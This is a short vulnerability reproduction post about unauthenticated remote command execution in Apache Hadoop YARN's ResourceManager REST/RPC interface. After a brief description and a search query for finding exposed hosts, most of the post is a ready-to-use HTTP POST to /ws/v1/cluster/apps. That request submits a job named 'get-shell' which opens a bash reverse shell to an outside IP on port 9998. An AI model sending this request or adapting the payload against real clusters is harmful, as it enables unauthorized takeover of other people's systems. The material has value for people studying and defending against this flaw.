Apache Hadoop Yarn Rpc Remote Command Execution Vulnerability
Apache Hadoop Yarn Rpc Remote Command Execution Vulnerability
Apache Hadoop Yarn RPC remote command execution vulnerability
Vulnerability Description
Hadoop Yarn RPC unauthorized access vulnerability exists in the ResourceManager in Hadoop Yarn, which is responsible for resource management and task scheduling. The cause is that the RPC service provided by this component to users can be accessed without authentication by default.
Vulnerability Impact
Apache Hadoop
Network surveying and mapping
app=”APACHE-hadoop-YARN”
Vulnerability reappears
Main page
Verify the request package
1
2
3
4
5
6
7
8
POST /ws/v1/cluster/apps HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 215
Content-Type: application/json
{"application-id": "application_1655112607010_0005", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9998 0>&1"}}, "application-type": "YARN"}
This post is licensed under CC BY 4.0 by the author.